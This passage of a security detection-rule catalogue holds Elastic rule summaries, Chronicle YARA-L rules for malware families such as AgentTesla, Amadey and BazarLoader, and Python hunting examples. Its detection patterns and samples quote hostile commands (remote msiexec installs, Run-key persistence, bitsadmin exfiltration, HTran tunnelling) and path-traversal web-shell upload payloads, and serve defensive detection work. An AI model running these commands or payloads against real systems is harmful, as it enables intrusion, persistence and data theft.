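        "source_ip": source_ip,
        "window_start": events[0]["ts"],
        "risk_score": 5,
        "acl_type": sorted({e["event_action"].lower() for e in events}),
        "attempted_programs": sorted({e["program"] for e in events}),
        "user_context": sorted({e["user"] for e in events if e["user"]}),
        "total_denials": len(events),
    }


def window_detections(events, window=WINDOW):
    """Group filtered events per source IP; start a new window when an event
    lands more than `window` after the first event of the current window."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort lexically
        if matches_event_filter(e):
            by_ip[e["ip"]].append(e)

    detections = []
    for ip, evs in by_ip.items():
        start, bucket = None, []
        for e in evs:
            t = datetime.fromisoformat(e["ts"])
            if start is not None and t - start > window:
                detections.append(outcome(ip, bucket))
                start, bucket = None, []
            if start is None:
                start = t
            bucket.append(e)
        detections.append(outcome(ip, bucket))
    return detections


if __name__ == "__main__":
    for d in window_detections(SAMPLE_EVENTS):
        print(d)
```

The ALLOW event and the event from a different product are dropped by the event filter before grouping, so `total_denials` counts only blocked gateway connections, exactly as the rule's `count($e.metadata.product_log_id)` does.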
Elastic Original KQL low T1098 ↗
AWS Bedrock Unauthorized Foundation Model Access Attempt
Identifies failed, access-denied attempts to enable account-level access to an Amazon Bedrock foundation model, either by granting a foundation-model entitlement, submitting a use case for model access, or creating a foundation-model agreement (accepting the EULA). These account-level "model access" actions unlock a foundation model so that it can subsequently be invoked. A principal that is repeatedly denied when attempting these actions may be a compromised or under-privileged identity probing for the ability to unlock expensive models (LLMjacking) or to establish a durable ability to invoke models. Unlike the companion rule that detects successful model-access grants, this rule surfaces the attempt itself, which is a high-signal indicator of credential boundary-testing even though access was not granted.
Elastic Original KQL low T1098 ↗
AWS Bedrock Unauthorized Resource-Based Policy Modification Attempt
Detects failed, access-denied attempts to modify or delete resource-based access policies on AWS Bedrock resources via the PutResourcePolicy and DeleteResourcePolicy API calls. Resource-based policies govern which principals (including external accounts) may access Bedrock resources such as agents, knowledge bases, and custom models. A principal that is repeatedly denied when attempting to attach or remove these policies may be a compromised or under-privileged identity probing for the ability to grant external or cross-account access, or to weaken existing access controls. Unlike the companion rule that detects successful changes, this rule surfaces the attempt itself, which is a high-signal indicator of credential boundary-testing even though no change occurred.
Elastic Original KQL low T1078 ↗
Azure Automation Account Created
Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment.
Elastic Original EQL low T1083 ↗
File and Directory Discovery
Enumeration of files and directories using built-in tools. Adversaries may use the information discovered to plan follow-on activity.
Elastic Original KQL low T1078 ↗
Kubernetes Unusual Decision by User Agent
This rule detects unusual request responses in Kubernetes audit logs through the use of the "new_terms" rule type. In production environments, default API requests are typically made by system components or trusted users, who are expected to have a consistent user agent and allowed response annotations. By monitoring for anomalies in the username and response annotations, this rule helps identify potential unauthorized access or misconfigurations in the Kubernetes environment.
Elastic Original EQL low T1189 ↗
Potential Cross Site Scripting (XSS)
Cross-Site Scripting (XSS) is a type of attack in which malicious scripts are injected into trusted websites. In XSS attacks, an attacker uses a benign web application to send malicious code, generally in the form of a browser-side script. This detection rule identifies the potential malicious executions of such browser-side scripts.
Elastic Original KQL low T1057 ↗
Process Discovery via Tasklist
Adversaries may attempt to get information about running processes on a system.
Elastic Original KQL low T1068 ↗
Strace Process Activity
Strace is a useful diagnostic, instructional, and debugging tool. This rule identifies a privileged context execution of strace which can be used to escape restrictive environments by instantiating a shell in order to elevate privileges or move laterally.
Elastic Original EQL low T1068 ↗
Suspicious Print Spooler SPL File Created
Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service including CVE-2020-1048 and CVE-2020-1337.
Elastic Original EQL low T1082 ↗
System Information Discovery via dmidecode from Parent Shell
This rule detects the use of dmidecode to gather system information from a Linux host when executed from a parent shell process. Adversaries may use dmidecode to collect detailed hardware and system information, which can aid in further exploitation or lateral movement within a network, or be used as a fingerprint for a compromised system.
Elastic Original KQL low T1033 ↗
User Discovery via Whoami
The whoami application was executed on a Linux host. This is often used by tools and persistence mechanisms to test for privileged access.
Chronicle (YARA-L) Original YARA-L T1053 ↗
T1053_005_windows_creation_of_scheduled_task
Creation of scheduled task using command line
Show query
rule T1053_005_windows_creation_of_scheduled_task
{
  meta:
    author = "Google Cloud Security"
    description = "Creation of scheduled task using command line"
    reference = "https://attack.mitre.org/techniques/T1053/005/"
    yara_version = "YL2.0"
    rule_version = "1.0"

  events:
    re.regex($e1.principal.process.command_line, `schtasks /create`) nocase

  condition:
    $e1
}
Chronicle (YARA-L) Original YARA-L T1003 ↗
a_variant_of_data_stealer_trojan_activity
This rule detects stealer behaviour in which the malware deletes itself. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule a_variant_of_data_stealer_trojan_activity {
 meta:
    author = "Emir Erdogan"
    description = "This rule detects stealer behaviour in which the malware deletes itself. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/f9ZYj4C5CNBg"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "T1129, T1003, T1114, T1012, T1107"

  events:
// path separator class [\\/] so the patterns match Windows backslash paths as well as forward slashes
((re.regex($selection.target.process.file.full_path, `.*[\\/]ralord\.exe`) or re.regex($selection.target.process.file.full_path, `.*[\\/]lodron\.exe`) or re.regex($selection.target.process.file.full_path, `.*[\\/]019\.exe`) or re.regex($selection.target.process.file.full_path, `.*[\\/]016\.exe`)) and (re.regex($selection.principal.process.file.full_path, `.*[\\/]setup_file\.exe`) or re.regex($selection.principal.process.file.full_path, `.*[\\/]setup_installer\.exe`)))

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1053 ↗
agenttesla_rat_detection
AgentTesla RAT Detection License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule agenttesla_rat_detection {
 meta:
    author = "Emir Erdogan"
    description = "AgentTesla RAT Detection  License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/bwpRaR1KCq8h"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "T1053, T1081"

  events:
($selection.principal.process.file.full_path = "8cab6413fdc97e9cc90607b3a49175a7.exe" and (re.regex($selection.target.process.file.full_path, `.*RegSvcs\.exe`) or $selection.target.process.file.full_path = "C:\\Windows\\System32\\schtasks.exe") and re.regex($selection.target.process.command_line, `.*/Create /TN \"Updates\\ZwqpnECNvoWf\" /XML \"C:\\Users\\admin\\AppData\\Local\\Temp\\tmp6CEB\.tmp\"`))

  condition:
    $selection
}
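Both the generic `schtasks /create` rule above (T1053_005_windows_creation_of_scheduled_task) and the AgentTesla rule, which keys on a task imported with `/XML` from a file under `%TEMP%`, come down to reading the options on a `schtasks` command line. The Python below is an added example, not code from the hunt pack or from the rule authors, that parses a `schtasks /create` line into its options and flags the traits a hunter triages on: a task XML or task action under a user-writable directory, `/RU SYSTEM`, and a per-minute schedule. The sample command lines are constructed; the first mirrors the pattern in the AgentTesla rule, and the directory list and trait names are this example's own choices.

```python
"""Added example (not part of the hunt pack): parse `schtasks /create` command
lines and flag the traits a hunter triages on. Sample command lines are constructed."""
import re
import shlex

# Directories an unprivileged user can write to; a task whose XML or action lives here is suspect.
USER_WRITABLE_DIR = re.compile(
    r"\\(AppData\\Local\\Temp|Windows\\Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)

# Constructed sample command lines (the first mirrors the AgentTesla rule's pattern).
SAMPLE_COMMAND_LINES = [
    'schtasks /Create /TN "Updates\\ZwqpnECNvoWf" /XML "C:\\Users\\admin\\AppData\\Local\\Temp\\tmp6CEB.tmp"',
    'schtasks /create /tn "OneDrive Sync" /tr "C:\\Users\\Public\\svchost.exe" /sc minute /mo 5 /ru SYSTEM /f',
    '"C:\\Windows\\System32\\schtasks.exe" /create /tn "\\Microsoft\\Windows\\Backup\\Nightly" '
    '/tr "C:\\Program Files\\Backup\\backup.exe" /sc daily /st 02:00',
    'schtasks /query /tn "OneDrive Sync"',
]


def parse_schtasks(cmdline):
    """Return {option: value} for a `schtasks /create` line, else None.
    Option names are lower-cased; value-less switches such as /F map to True."""
    try:
        # posix=False keeps Windows backslashes literal and quotes attached to their token
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:          # unbalanced quotes
        return None
    if not tokens:
        return None
    exe = tokens[0].strip('"').lower()
    if exe not in ("schtasks", "schtasks.exe") and not exe.endswith("\\schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith("/"):
            i += 1
            continue
        key = tok[1:].lower()
        if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            opts[key] = tokens[i + 1].strip('"')
            i += 2
        else:
            opts[key] = True
            i += 1
    return opts if "create" in opts else None


def assess(cmdline):
    """Return the suspicious traits of a task creation (empty list if none),
    or None when the line is not a `schtasks /create`."""
    opts = parse_schtasks(cmdline)
    if opts is None:
        return None
    reasons = []
    xml = opts.get("xml")
    if isinstance(xml, str) and USER_WRITABLE_DIR.search(xml):
        reasons.append("xml_import_from_user_writable_dir")
    tr = opts.get("tr")
    if isinstance(tr, str) and USER_WRITABLE_DIR.search(tr):
        reasons.append("task_runs_from_user_writable_dir")
    ru = opts.get("ru")
    if isinstance(ru, str) and ru.lower() in ("system", "nt authority\\system"):
        reasons.append("runs_as_system")
    if str(opts.get("sc", "")).lower() == "minute":
        reasons.append("high_frequency")
    return reasons


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(assess(line), "<-", line)
```

The `/XML` case matters because an imported task definition carries its action, trigger and principal inside the file, so a rule that only inspects `/TR` or `/RU` on the command line sees nothing; the file path is the one signal left on the process event.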
Chronicle (YARA-L) Original YARA-L T1059 ↗
amadey_botnet_detection_ta505
This rule detects a bot called Amadey. It is used to collect information about the victim's environment, though it can also deliver other malware. The threat actor is considered to be TA505. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule amadey_botnet_detection_ta505 {
 meta:
    author = "Ariel Millahuel"
    description = "This rule detects a bot called Amadey. It is used to collect information about the victim's environment, though it can also deliver other malware. The threat actor is considered to be TA505. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/oETtTqqsUAmk"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "execution, T1059"

  events:
($selection1.metadata.product_event_type = "13" and (re.regex($selection1.target.registry.registry_key, `.*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.*`) or re.regex($selection1.target.registry.registry_key, `.*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders.*`)) and (re.regex($selection1.metadata.description, `.* rundll32 C:\\Users.*\\AppData\\Local\\Temp\\cred\.dll, Main.*`) or re.regex($selection1.metadata.description, `.* rundll32 C:\\Users.*\\AppData\\Local\\Temp.*\.dll, Main.*`) or re.regex($selection1.metadata.description, `.*C:\\ProgramData\\87e4c89e95.*`) or re.regex($selection1.metadata.description, `.*C:\\ProgramData\\87.*`)))

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1059 ↗
amadey_botnet_detection_ta505_part_1
This rule detects a bot called Amadey. It is used to collect information about the victim's environment, though it can also deliver other malware. The threat actor is considered to be TA505. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule amadey_botnet_detection_ta505_part_1 {
 meta:
    author = "Ariel Millahuel"
    description = "This rule detects a bot called Amadey. It is used to collect information about the victim's environment, though it can also deliver other malware. The threat actor is considered to be TA505. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/oETtTqqsUAmk"
    version = "0.01"
    created = "2021-03-09"
    category = "process_creation"
    product = "windows"
    mitre = "execution, T1059"

  events:
(($selection2.target.process.command_line = "rundll32.exe C:\\Users\\admin\\AppData\\Local\\Temp\\cred.dll, Main" or re.regex($selection2.target.process.command_line, `msiexec\.exe STOP=1 /i http://.*\..*\..*\..*/dom.* /q ksw=%TEMP%`) or re.regex($selection2.target.process.command_line, `msiexec\.exe STOP=1 /i https://.*\..*\..*\..*/dom.* /q ksw=%TEMP%`) or $selection2.target.process.command_line = "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\87e4c89e95" or re.regex($selection2.target.process.command_line, `REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\87.*`)) and ($selection2.metadata.product_event_type = "4688" or $selection2.metadata.product_event_type = "1"))

  condition:
    $selection2
}
Chronicle (YARA-L) Original YARA-L T1059 ↗
apt10_behavior
Detects an APT10 technique that uses the Windows "certutil.exe" functionality for payload decoding. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule apt10_behavior {
 meta:
    author = "Ariel Millahuel"
    description = "Detects an APT10 technique that uses the Windows \"certutil.exe\" functionality for payload decoding. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/eG23WH8AEKB0"
    version = "0.01"
    created = "2021-03-09"
    category = "process_creation"
    product = "windows"
    mitre = "execution, T1059"

  events:
(($selection1.metadata.product_event_type = "4688" or $selection1.metadata.product_event_type = "1") and (($selection1.target.process.file.full_path = "cmd.exe" and (re.regex($selection1.target.process.command_line, `.*/c certutil -decode C:\\ProgramData\\padre1\.txt C:\\ProgramData.*\\GUP\.txt.*`) or re.regex($selection1.target.process.command_line, `.*/c certutil -decode C:\\ProgramData\\padre2\.txt C:\\ProgramData.*\\libcurl\.txt.*`) or re.regex($selection1.target.process.command_line, `.* /c certutil -decode C:\\ProgramData\\padre3\.txt C:\\ProgramData.*\\3F2E3AB9 .*`))) or ($selection1.target.process.file.full_path = "esentutl.exe" and (re.regex($selection1.target.process.command_line, `.* /y C:\\ProgramData.*\\GUP\.txt /d C:\\ProgramData\\GUP\.exe /o .*`) or re.regex($selection1.target.process.command_line, `.* /y C:\\ProgramData.*\\libcurl\.txt /d C:\\ProgramData\\libcurl\.dll /o .*`)))))

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1100 ↗
atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal
Detects Atlassian Confluence RCE via Attachment Download. Sample regex added to detect directory traversal, it can be improved. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal {
 meta:
    author = "Halil Ibrahim Cosgun"
    description = "Detects Atlassian Confluence RCE via Attachment Download. Sample regex added to detect directory traversal, it can be improved.  License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/pCBpTAya0HBi"
    version = "0.01"
    created = "2021-03-09"
    product = "proxy"
    mitre = "initial_access, persistence, privilege_escalation, T1190, T1100"

  events:
// Flag a ".." path segment, raw or percent-encoded, in the filename or name parameter of the upload request
($selection.network.http.method = "POST" and re.regex($selection.target.url, `/plugins/drag-and-drop/upload\.action\?.*[?&](filename|name)=[^&]*(\.\.(/|\\|%2f|%5c)|%2e%2e)`) nocase)

  condition:
    $selection
}
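The rule above matches the upload URL with a single regular expression, and its own description says the traversal check can be improved. The Python below is an added example, not code from the hunt pack or the rule author, that does the check the way a proxy-log hunter would want it: split the query string, look only at the `filename` and `name` parameters, undo repeated percent-encoding so `%2e%2e%2f` and `%252e%252e%255c` are seen for what they are, and flag a `..` path segment in either slash direction. The request lines are constructed; the `/confluence` context path in one of them is an assumption included to show that the match keys on the path suffix rather than the full path.

```python
"""Added example (not part of the hunt pack): detect directory traversal in the
filename/name parameters of Confluence drag-and-drop upload requests, including
percent-encoded and double-encoded variants. Sample request lines are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

UPLOAD_ACTION = "/plugins/drag-and-drop/upload.action"
CHECKED_PARAMS = ("filename", "name")
# a ".." segment delimited by start/end of string, "/" or "\"
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Constructed sample proxy events: (method, request URL).
SAMPLE_REQUESTS = [
    ("POST", "/plugins/drag-and-drop/upload.action?pageId=1234&filename=report.pdf&size=10"
             "&mimeType=application/pdf&atl_token=t0k&name=report.pdf"),
    ("POST", "/plugins/drag-and-drop/upload.action?pageId=1234&filename=..%2F..%2Fwebapps%2FROOT%2Fshell.jsp"
             "&size=10&mimeType=text/plain&atl_token=t0k&name=x"),
    ("POST", "/confluence/plugins/drag-and-drop/upload.action?pageId=1&filename=%252e%252e%255cshell.jsp"
             "&size=1&mimeType=text/plain&atl_token=t0k&name=%252e%252e%255cshell.jsp"),
    ("GET", "/plugins/drag-and-drop/upload.action?pageId=1&filename=..%2Fx&size=1&mimeType=x&atl_token=t0k&name=y"),
]


def fully_decode(value, max_rounds=3):
    """Strip up to max_rounds layers of percent-encoding (catches %252e%252e%252f)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(url):
    """Return {param: decoded value} for checked params that carry a '..' segment."""
    parts = urlsplit(url)
    if not parts.path.endswith(UPLOAD_ACTION):
        return {}
    query = parse_qs(parts.query, keep_blank_values=True)   # removes one encoding layer
    hits = {}
    for param in CHECKED_PARAMS:
        for raw in query.get(param, []):
            value = fully_decode(raw)                        # and any layers stacked on top
            if TRAVERSAL_RE.search(value):
                hits[param] = value
    return hits


def scan(requests):
    """Apply the rule's filter (POST to the upload action) and return (index, hits) per match."""
    findings = []
    for i, (method, url) in enumerate(requests):
        if method != "POST":
            continue
        hits = traversal_params(url)
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS):
        print(index, hits)
```

Decoding before matching is the point: a regex applied to the raw URL has to enumerate every encoding the attacker might use, while decoding to a canonical form lets one short pattern cover `../`, `..\`, `%2e%2e%2f` and the double-encoded forms alike.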
Chronicle (YARA-L) Original YARA-L T1083 ↗
backdoor_detection_on_sql_servers
Detects the URLs and IPs associated with an attack targeting the aviation industry that installs a backdoor on SQL servers. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule backdoor_detection_on_sql_servers {
 meta:
    author = "Furkan Celik"
    description = "Detects the URLs and IPs associated with an attack targeting the aviation industry that installs a backdoor on SQL servers. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/Ov3SO6d6u76i"
    version = "0.01"
    created = "2020/04/01"
    product = "proxy"
    mitre = "T1086, T1083, T1132, T1088"

  events:
(($selection.target.url = "a.vollar.ga" or $selection.target.url = "aa.vollar.ga" or $selection.target.url = "b.vollar.ga" or $selection.target.url = "c.vollar.ga" or $selection.target.url = "ca.vollar.ga" or $selection.target.url = "d.vollar.ga" or $selection.target.url = "da.vollar.ga" or $selection.target.url = "f.vollar.ga" or $selection.target.url = "h.vollar.ga" or $selection.target.url = "ja.vollar.ga" or $selection.target.url = "k.vollar.ga" or $selection.target.url = "m.vollar.ga" or $selection.target.url = "ma.vollar.ga" or $selection.target.url = "n.vollar.ga" or $selection.target.url = "na.vollar.ga" or $selection.target.url = "o.vollar.ga" or $selection.target.url = "oa.vollar.ga" or $selection.target.url = "ob.vollar.ga" or $selection.target.url = "s.vollar.ga" or $selection.target.url = "sa.vollar.ga" or $selection.target.url = "t.vollar.ga" or $selection.target.url = "ta.vollar.ga" or $selection.target.url = "v.vollar.ga" or $selection.target.url = "x.vollar.ga" or $selection.target.url = "xa.vollar.ga" or $selection.target.url = "z.vollar.ga") and ($selection.principal.ip = "183.131.3.196" or $selection.principal.ip = "192.37.90.118" or $selection.principal.ip = "39.109.116.162" or $selection.principal.ip = "154.221.26.108" or $selection.principal.ip = "103.53.211.94" or $selection.principal.ip = "185.172.66.203" or $selection.principal.ip = "51.105.249.223" or $selection.principal.ip = "154.211.14.66" or $selection.principal.ip = "154.221.19.221" or $selection.principal.ip = "145.239.23.7" or $selection.principal.ip = "180.97.220.5" or $selection.principal.ip = "207.180.202.208"))

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1059 ↗
bazar_loader_detection_sysmon_detection
BazarLoader (also known as Bazar Loader, Bazar Backdoor or Team9 Backdoor) is a module of the dreaded TrickBot Trojan. It is mostly used to gain a foothold in compromised enterprise networks License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule bazar_loader_detection_sysmon_detection {
 meta:
    author = "Ariel Millahuel"
    description = "BazarLoader (also known as Bazar Loader, Bazar Backdoor or Team9 Backdoor) is a module of the dreaded TrickBot Trojan. It is mostly used to gain a foothold in compromised enterprise networks  License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/QDvyH85txiBA"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "execution, T1059"

  events:
($selection1.metadata.product_event_type = "11" and (re.regex($selection1.target.file.full_path, `.*DD45\.exe.*`) or re.regex($selection1.target.file.full_path, `.*BthCxn\.exe.*`) or re.regex($selection1.target.file.full_path, `.*v86\.exe_.*`)))

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1190 ↗
burp_suite_scanner_and_burp_collaborator_detected_via_proxy
Burp Suite Scanner Activity Detected via Proxy. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule burp_suite_scanner_and_burp_collaborator_detected_via_proxy {
 meta:
    author = "Emir Erdogan"
    description = "Burp Suite Scanner Activity Detected via Proxy. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/QhIyqc5Qdl6m"
    version = "0.01"
    created = "2021-03-09"
    category = "proxy"
    mitre = "T1190, T1210"

  events:
re.regex($selection.target.url, `.*burpcollaborator.*`)

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1105 ↗
certutil_activity_via_proxy
This rule can be used to hunt for Living off the Land activity from certutil in proxy server logs. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule certutil_activity_via_proxy {
 meta:
    author = "Joseph Kamau"
    description = "This rule can be used to hunt for Living off the Land activity from certutil in proxy server logs. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/E64jgRkkRkTS"
    version = "0.01"
    created = "2021-03-09"
    product = "proxy"
    mitre = "command&control, T1105, defense-evasion, T1140"

  events:
($selection.principal.application = "CertUtil URL Agent" or re.regex($selection.principal.application, `Microsoft-CryptoAPI/.*`))

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1053 ↗
covid19_phishing_campaign_fake_world_health_organization
Coronavirus-themed malware is downloaded via a fake WHO phishing email. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule covid19_phishing_campaign_fake_world_health_organization {
 meta:
    author = "Emir Erdogan"
    description = "Coronavirus-themed malware is downloaded via a fake WHO phishing email. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/xyaUex2Ka9Lq"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "T1129, T1060, T1053, T1059"

  events:
(($selection1.principal.process.file.full_path = "C:\\Windows\\system32\\cmd.exe" and (($selection1.target.process.file.full_path = "C:\\Windows\\system32\\findstr.exe" and re.regex($selection1.target.process.command_line, `findstr\.exe  \"TVNDRgAAAA\" .*\\AppData\\Local\\Temp\\\\g4ZokyumBB2gDn\.tmp`)) or (re.regex($selection1.target.process.file.full_path, `.*\\AppData\\Local\\Temp\\msoia\.exe`) and re.regex($selection1.target.process.command_line, `.*\\AppData\\Local\\Temp\\\\msoia\.exe  -decode .*AppData\\Local\\Temp\\\\cSi1r0uywDNvDu\.tmp .*\\AppData\\Local\\Temp\\\\oGhPGUDC03tURV\.tmp`)))) or (re.regex($selection1.target.process.file.full_path, `.*\\OFFICE12\\Wordcnvpxy\.exe`) and re.regex($selection1.principal.process.file.full_path, `.*MSOSTYLE\.exe`)))

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1012 ↗
covid19_themed_malware_via_chm_file
COVID-19 themed malware delivered via a CHM file that is decompiled with hh.exe. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule covid19_themed_malware_via_chm_file {
 meta:
    author = "Emir Erdogan"
    description = "COVID-19 themed malware delivered via a CHM file that is decompiled with hh.exe. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/n0COmCxxqXD5"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "T1059, T1204, T1012"

  events:
(($selection1.target.process.file.full_path = "C:\\Windows\\System32\\cmd.exe" and $selection1.principal.process.file.full_path = "C:\\Windows\\hh.exe" and re.regex($selection1.target.process.command_line, `.*for %i in \(.*\.chm\) do \(hh -decompile %temp% %~i\)&&cmd /c %temp%/~tmp6\.cab`)) or ($selection1.principal.process.file.full_path = "C:\\Windows\\System32\\cmd.exe" and $selection1.target.process.file.full_path = "C:\\Windows\\hh.exe" and re.regex($selection1.target.process.command_line, `hh -decompile .*COVID-19\.chm.*`)))

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1011 ↗
data_exfiltration_attempt_via_bitsadmin
Using bitsadmin to exfiltrate data License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule data_exfiltration_attempt_via_bitsadmin {
 meta:
    author = "Emir Erdogan"
    description = "Using bitsadmin to exfiltrate data  License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/HjIK6Euup7w0"
    version = "0.01"
    created = "2021-03-09"
    category = "sysmon"
    product = "windows"
    mitre = "T1020, T1041, T1011"

  events:
(re.regex($selection.target.process.file.full_path, `.*\\bitsadmin\.exe`) and re.regex($selection.target.process.command_line, `.*bitsadmin\.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY.*`))

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1041 ↗
data_exfiltration_detection_with_htran
Like most cyber-espionage groups, APT10's main goal is to exfiltrate critical data from the victim's environment. To exfiltrate data from a victim network segment that is not connected to the internet, a bridge tool is needed to redirect ports and connections between the two segments; in this case the threat group deployed HTran for that purpose. Over the past years Chinese threat groups have been observed using HTran in attacks worldwide. The executable was seen as java.exe on compromised hosts. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule data_exfiltration_detection_with_htran {
 meta:
    author = "Furkan Celik"
    description = "Like most cyber-espionage groups, APT10's main goal is to exfiltrate critical data from the victim's environment. To exfiltrate data from a victim network segment that is not connected to the internet, a bridge tool is needed to redirect ports and connections between the two segments; in this case the threat group deployed HTran for that purpose. Over the past years Chinese threat groups have been observed using HTran in attacks worldwide. The executable was seen as java.exe on compromised hosts. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/CBsRA1zfmrfE"
    version = "0.01"
    created = "2020/04/12"
    product = "windows"
    service = "security"
    mitre = "T1041, Exfiltration"

  events:
(re.regex($selection.target.process.command_line, `.*java\.exe %% 1936 0x199c .*java\.exe -ht listenip:8080 -hu username -hp password C&C:443 NULL SID -- 0x0`) and $selection.metadata.product_event_type = "1" and re.regex($selection.target.process.file.full_path, `.*java\.exe`))

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1003 ↗
detection_of_safetykatz
Detects possible SafetyKatz Behaviour License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule detection_of_safetykatz {
 meta:
    author = "Markus Neis"
    description = "Detects possible SafetyKatz Behaviour  License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/bx1gtxYzjwHz"
    version = "0.01"
    created = "2018/07/24"
    product = "windows"
    service = "sysmon"
    mitre = "credential_access, T1003"

  events:
($selection.metadata.product_event_type = "11" and re.regex($selection.target.file.full_path, `.*\\Temp\\debug\.bin`))

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1112 ↗
ekanssnake_ransomware_sysmon_detection
EKANS/SNAKE is ransomware that targets ICS (Industrial Control Systems) environments. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule ekanssnake_ransomware_sysmon_detection {
 meta:
    author = "Ariel Millahuel"
    description = "EKANS/SNAKE is ransomware that targets ICS (Industrial Control Systems) environments. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/NaOKwNFrbyKd"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "defense_evasion, T1112"

  events:
